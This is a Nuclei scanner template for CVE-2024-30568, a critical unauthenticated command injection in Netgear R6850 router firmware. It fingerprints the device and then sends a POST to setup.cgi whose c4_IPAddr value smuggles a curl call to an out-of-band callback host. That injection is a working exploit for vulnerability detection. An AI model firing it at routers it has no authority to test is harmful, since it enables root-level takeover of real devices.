id: CVE-2024-30568

info:
  name: Netgear R6850 V1.1.0.88 - Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    Netgear R6850 router firmware version V1.1.0.88 suffers from a command injection vulnerability in the ping_test functionality. An unauthenticated attacker can inject arbitrary system commands through the c4_IPAddr parameter, resulting in remote code execution as root.
  impact: |
    Attackers can execute arbitrary commands on the router, leading to complete device compromise.
  remediation: |
    Update Netgear R6850 firmware to a version that patches the command injection vulnerability.
  reference:
    - https://github.com/funny-mud-peee/IoT-vuls/blob/main/netgear%20R6850/Netgear-R6850%20V1.1.0.88%20Command%20Injection(ping_test).md
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30568
    - https://www.netgear.com/about/security/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-30568
    cwe-id: CWE-94
    epss-score: 0.89661
    epss-percentile: 0.99582
  metadata:
    verified: true
    max-request: 1
    product: Netgear R6850 Router
    vendor: Netgear
    version: V1.1.0.88
    fofa-query: app="NETGEAR" && "R6850"
  tags: cve,cve2024,cve2024-30568,netgear,router,rce,oast,iot,rce,command-injection,vuln

flow: http(1) && http(2)

http:
  # Request 1: fingerprint. The internal matcher gates request 2 on a response that mentions "netgear".
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: response
        words:
          - "netgear"
        case-insensitive: true
        internal: true

  # Request 2: ping_test check. A match requires an out-of-band HTTP or DNS interaction and a 200 status.
  - raw:
      - |
        POST /setup.cgi?id=0&sp=1337 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        todo=ping_test&c4_IPAddr=127.0.0.1 && curl {{interactsh-url}}&next_file=diagping.htm

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e890b7f0d9a20c94cbb66539f4991dd4732b10741e2ee93d9f28374f0d934306022046e01fd04aca41810e6e042f2229c8fe26990a007b4a7a5ac82767cc1f072438:922c64590222798bb761d5b6d8e72950